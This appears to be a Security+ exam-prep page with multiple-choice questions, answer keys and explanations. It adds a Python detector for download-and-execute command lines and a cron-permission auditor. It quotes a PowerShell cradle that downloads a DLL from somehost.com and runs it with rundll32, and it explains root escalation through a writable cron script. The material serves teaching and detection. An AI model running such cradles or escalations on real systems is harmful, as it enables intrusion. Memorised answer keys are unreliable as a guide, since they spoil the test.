CompTIA Security+ SY0-601 – Question390

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is
reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?


A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

Correct Answer: A

Explanation:

The file fetched from the URL is named as a JPEG, but the script saves it as autoupdate.dll in %TEMP% and then loads it with rundll32.exe, so the image name is only camouflage: nothing is displayed, no environment variable is set, and Windows Update is never touched. Download, drop into TEMP, load via rundll32 is a download-and-execute cradle, which the exam classifies as DLL injection.
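
The pattern in the script above, written as detection logic an analyst could run over process-creation telemetry. This is an added example, not part of the exam page; the records in SAMPLE_EVENTS are constructed (Sysmon Event ID 1 style fields), and the indicator names and the threshold are choices made for illustration.

```python
"""Detect download-and-execute ("download cradle") command lines such as the
one in Question 390: fetch a remote file, write it under TEMP, load it with
rundll32.exe.

Added example. SAMPLE_EVENTS are constructed process-creation records,
not real telemetry."""
import re

SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg "
            r"-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll"},
    {"pid": 4188, "parent": "powershell.exe",
     "cmd": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\autoupdate.dll"},
    {"pid": 5002, "parent": "explorer.exe",
     "cmd": r"powershell.exe -Command Get-ChildItem C:\Reports | Measure-Object"},
    {"pid": 5100, "parent": "services.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Weak indicators: individually common, suspicious when several line up.
RULES = [
    ("remote download", re.compile(
        r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|-uri\b|-outfile\b"
        r"|start-bitstransfer|\bcurl\b|\bwget\b)", re.I)),
    ("execution primitive", re.compile(
        r"(\brundll32(\.exe)?\b|\bregsvr32(\.exe)?\b|start-process|invoke-expression|\biex\b)", re.I)),
    ("temp directory", re.compile(r"(\$env:temp|%temp%|\\appdata\\local\\temp\\)", re.I)),
    # A URL ending in an image/document extension saved with a code extension.
    ("extension mismatch", re.compile(
        r"https?://\S+\.(jpe?g|png|gif|txt|pdf)\b.*?-outfile\s+\S+\.(dll|exe|ps1|vbs|js)\b", re.I)),
]

# Strong indicator: rundll32 handed a DLL that lives in a user-writable temp path.
RUNDLL32_FROM_TEMP = re.compile(
    r"\brundll32(\.exe)?\s+.*?(\\temp\\|\$env:temp\\|%temp%\\).*\.dll\b", re.I)


def score_command(cmd):
    """Return the list of indicator names that match a command line."""
    reasons = [name for name, rx in RULES if rx.search(cmd)]
    if RUNDLL32_FROM_TEMP.search(cmd):
        reasons.append("rundll32 loading a DLL from a temp path")
    return reasons


def find_suspicious(events, threshold=3):
    """Flag an event when the strong indicator fires or when at least
    `threshold` weak indicators fire together."""
    hits = []
    for ev in events:
        reasons = score_command(ev["cmd"])
        strong = any(r.startswith("rundll32") for r in reasons)
        if strong or len(reasons) >= threshold:
            hits.append({"pid": ev["pid"], "parent": ev["parent"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["pid"], hit["parent"], "->", "; ".join(hit["reasons"]))
```

Both the PowerShell stage (pid 4120) and the resulting rundll32 child (pid 4188) are flagged; the benign rundll32 call loading shell32.dll from the system directory is not.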

CompTIA Security+ SY0-601 – Question389

A penetration tester executes the command crontab -l while working in a Linux server environment. The
penetration tester observes the following string in the current user's list of cron jobs:
*/10 * * * * root /writable/update.sh
Which of the following actions should the penetration tester perform NEXT?


A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

Correct Answer: A

Explanation:

The entry runs /writable/update.sh as root every ten minutes. If the tester can modify that script (the directory name suggests so), anything appended to it executes as root on the next run, so the next step is to check the file and directory permissions and attempt privilege escalation. The other options are vulnerability classes, not actions.
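
The permission check a tester performs before the escalation attempt, as a small cron audit. This is an added example, not part of the exam page: the cron lines and scripts it examines are constructed by build_demo() in a temporary directory, and the uid 65534 used to model an unprivileged user is an assumption.

```python
"""Audit cron entries for the privilege-escalation condition in Question 389:
a job that runs as root from a script a low-privilege user can modify.

Added example, not part of the exam page. build_demo() creates constructed
cron lines and scripts in a temporary directory; nothing here reads or
changes a real crontab."""
import os
import stat
import tempfile

SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_cron_line(line, has_user_field):
    """Return (schedule, user, command), or None for blanks, comments and VAR=value.

    `crontab -l` output has no user column; /etc/crontab and /etc/cron.d do,
    which is the shape of the line in the question ("root" after the schedule)."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    parts = line.split()
    if parts[0].startswith("@"):                       # @reboot, @daily, ...
        schedule, rest = parts[0], parts[1:]
    else:
        schedule, rest = " ".join(parts[:SCHEDULE_FIELDS]), parts[SCHEDULE_FIELDS:]
    user = None
    if has_user_field and rest:
        user, rest = rest[0], rest[1:]
    if not rest:
        return None
    return schedule, user, " ".join(rest)


def can_write(st, uid, gids):
    """Permission-bit check for the identity (uid, gids); root writes anything."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_cron_lines(lines, has_user_field, uid=None, gids=None):
    """Return entries whose target script the given identity could alter.

    uid/gids default to the calling process; pass an unprivileged identity to
    see what that user could do. Only absolute paths are checked."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getgid()} if gids is None else set(gids)
    hits = []
    for line in lines:
        parsed = parse_cron_line(line, has_user_field)
        if parsed is None:
            continue
        schedule, user, command = parsed
        path = command.split()[0]
        if not path.startswith("/"):
            continue
        reasons = []
        exists = os.path.exists(path)
        if exists:
            st = os.stat(path)
            if can_write(st, uid, gids):
                reasons.append("script writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("script world-writable")
        try:
            parent_st = os.stat(os.path.dirname(path))
        except FileNotFoundError:
            parent_st = None
        # A writable, non-sticky parent lets the user delete and recreate the
        # script even when the file itself is read-only.
        if parent_st and can_write(parent_st, uid, gids) and not parent_st.st_mode & stat.S_ISVTX:
            reasons.append("parent directory writable" + ("" if exists else ", script missing"))
        if reasons:
            hits.append({"schedule": schedule, "user": user, "path": path, "reasons": reasons})
    return hits


def build_demo():
    """Constructed fixture: one world-writable script (the misconfiguration in
    the question) and one properly protected script, plus cron lines for both."""
    d = tempfile.mkdtemp(prefix="cron-audit-")
    bad, good = os.path.join(d, "update.sh"), os.path.join(d, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho running\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    os.chmod(d, 0o755)
    lines = ["# m h dom mon dow user command", "SHELL=/bin/sh",
             "*/10 * * * * root %s" % bad, "0 3 * * * root %s --full" % good]
    return lines, bad, good


if __name__ == "__main__":
    demo_lines, _, _ = build_demo()
    for hit in audit_cron_lines(demo_lines, has_user_field=True, uid=65534, gids={65534}):
        print(hit["user"], hit["path"], "->", "; ".join(hit["reasons"]))
```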

CompTIA Security+ SY0-601 – Question387

A company recently implemented a patch management policy; however, vulnerability scanners have still been
flagging several hosts, even after the completion of the patch process. Which of the following is the MOST
likely cause of the issue?


A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

Correct Answer: C

Explanation:

A patch management process that covers only the operating system leaves third-party applications (browsers, Java runtimes, PDF readers and similar) at their old versions, so the scanner keeps flagging the same hosts after every patch cycle. Unsupported firmware affects a narrower set of devices, zero-days would not yet be in the scanner's checks, and outsourced development is unrelated to patching.

CompTIA Security+ SY0-601 – Question386

An incident response technician collected a mobile device during an investigation. Which of the following should
the technician do to maintain chain of custody?


A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

Correct Answer: A

CompTIA Security+ SY0-601 – Question385

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules,
but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the
following would be the BEST option to remove the rules?


A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

Correct Answer: B

Explanation:

iptables -F flushes every rule from every chain of the filter table, which is where the rules dropping the connections live. -t mangle -X only deletes empty user-defined chains in the mangle table, -Z only zeroes packet and byte counters, and -P INPUT -j DROP is not valid -P syntax (a policy is given as a bare target, e.g. -P INPUT DROP) and would set a DROP policy rather than remove anything. Note that -F does not touch chain policies: if the default policy had been changed to DROP, traffic stays blocked after the flush until the policy is reset with iptables -P INPUT ACCEPT (and likewise for FORWARD and OUTPUT).

CompTIA Security+ SY0-601 – Question384

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The
installation of the antivirus application was tested on many personal devices, and no issues were observed.
Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the
company decided to remove the mining software. The antivirus application was MOST likely classifying the
software as:


A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

Correct Answer: B

CompTIA Security+ SY0-601 – Question383

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and
manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the
data due to its sensitivity. The financial institution is not concerned about computational overheads and slow
speeds. Which of the following cryptographic techniques would BEST meet the requirement?


A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

Correct Answer: C

Explanation:

The requirement is to compute on the data while it stays encrypted, so the provider never holds plaintext; that is the defining property of homomorphic encryption. Symmetric and asymmetric schemes protect data at rest and in transit but require decryption before any manipulation, and "ephemeral" describes short-lived session keys, not a way to process ciphertext. The remark that overhead and slow speed are acceptable also points to homomorphic encryption, whose main practical drawback is performance.

CompTIA Security+ SY0-601 – Question382

As part of annual audit requirements, the security team performed a review of exceptions to the company policy
that allows specific users the ability to use USB storage devices on their laptops. The review yielded the
following results:
The exception process and policy have been correctly followed by the majority of users.
A small number of users did not create tickets for the requests but were granted access.
All access had been approved by supervisors.
Valid requests for the access sporadically occurred across multiple departments.
Access, in most cases, had not been removed when it was no longer needed.
Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded
access is removed in a reasonable time frame?


A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee's supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

Correct Answer: C

CompTIA Security+ SY0-601 – Question381

Users report access to an application from an internal workstation is still unavailable to a specific server, even
after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful
between the two devices. Which of the following tools should the security analyst use to help identify if the
traffic is being blocked?


A. nmap
B. tracert
C. ping
D. ssh

Correct Answer: B

Explanation:

Reference: https://support.microsoft.com/en-us/topic/how-to-use-tracert-to-tro…windows-e643d72b-2f4f-cdd6-09a0-fd2989c7ca8e#:~:text=TRACERT%20is%20useful%20for%20troubleshooting,routers%20or%20bridges)%20are%20involved